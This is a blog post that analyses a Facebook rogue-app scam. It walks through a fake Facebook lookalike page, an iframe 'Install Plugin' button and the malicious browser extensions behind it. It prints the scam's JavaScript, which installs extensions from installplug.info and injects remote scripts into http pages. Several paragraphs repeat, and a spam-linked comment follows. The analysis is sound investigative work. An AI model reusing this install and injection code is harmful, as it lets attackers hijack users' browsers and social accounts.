Recently a couple of my friends were affected by a rogue app that posted crap using their accounts, and I was a bit curious how everything worked. But, typically they are so short lived, that by the time I get to see them, they are gone from the face of the internet, but, this time...
Luckily today another of my friends *liked* one such shit, and lets see how it works...
First off, it links to an exact Facebook look alike page... http://kustuntuniya.blogspot.com/?3
The page is an exact look alike, however, the lazy fellows were lazy enough not actually make all the links work. The header is just a div element with a CSS background image.
background: url("http://i55.tinypic.com/jpj7fl.jpg") no-repeat scroll center top #3B5998;
Similarly the bottom part, is another image http://i.imgur.com/ZJLcI.jpg
Now, its the middle part that is actually interesting.
The whole dark area is an iframe containing the page http://installplug.info/girlplugin.html
The page has all the elements and the button like anchor tag, "Install Plugin", with the following code,
<a class="install nomargin" onclick="instalar();">a>
So, it call our beloved instalar function in javascript, which is found above in a script tag.
The next two lines tell them the type of browser... To install the XPI addon for firefox and CRX addon for Google chrome.
var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
First off, it links to an exact Facebook look alike page... http://kustuntuniya.blogspot.com/?3
The page is an exact look alike, however, the lazy fellows were lazy enough not actually make all the links work. The header is just a div element with a CSS background image.
background: url("http://i55.tinypic.com/jpj7fl.jpg") no-repeat scroll center top #3B5998;
Now, its the middle part that is actually interesting.
The whole dark area is an iframe containing the page http://installplug.info/girlplugin.html
The page has all the elements and the button like anchor tag, "Install Plugin", with the following code,
<a class="install nomargin" onclick="instalar();">a>
So, it call our beloved instalar function in javascript, which is found above in a script tag.
The next two lines tell them the type of browser... To install the XPI addon for firefox and CRX addon for Google chrome.
var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
function instalar()
{
//Installls CHROME addon
if ( is_chrome ){
window.open("http://installplug.info/youtube.crx");
}
else if ( is_firefox ) {
var params = {
"Youtube Extension": {
URL: "http://installplug.info/youtube.xpi",
toString: function () { return this.URL; }
}
};
//Installs Firefox addon
InstallTrigger.install(params);
}
else{
window.open("http://installplug.info/shirt/complete.php");
}
}
At this point the browser has been successfully compromised, with a damned extension, installed fully with the gullible user's explicit permission!!!
Now to the damned browser extensions. Getting late, but tonight I'd rather give in to curiosity....
So I downloaded and extracted both the plugins. The extensions use youtube icons to keep the user fooled.
Both the browser plugins do the same thing,
When the user visits any page, it first checks whether it is a protected (https) page or not. If it is protected, it does nothing,
if ('https:' == document.location.protocol) return false;
if the page is a normal page (http), it injects its own script as a child in the head.
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://installplug.info/script.js");
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://installplug.info/script.js");
Now, got to download another script to see the actual rascal.
And here I go again, well, the file has code to download another script and inject the new one in the same page...
s.setAttribute("src", "http://munishocks.info/new/extra.js");
The trail got cold here..., I'm unable to download the new file. Maybe I'm late once again. Next time, send it to me SOOOON.
The trail got cold here..., I'm unable to download the new file. Maybe I'm late once again. Next time, send it to me SOOOON.
thanks for this Usefull post, this is the only result when is search about http://munishocks.info/new/extra.js, coz this js keeps on appearing on my offline site error when i turn on web console of my gchrome.. I also experienced this kind of spam a few months ago...
ReplyDeletewww.wapdabarkads.co.cc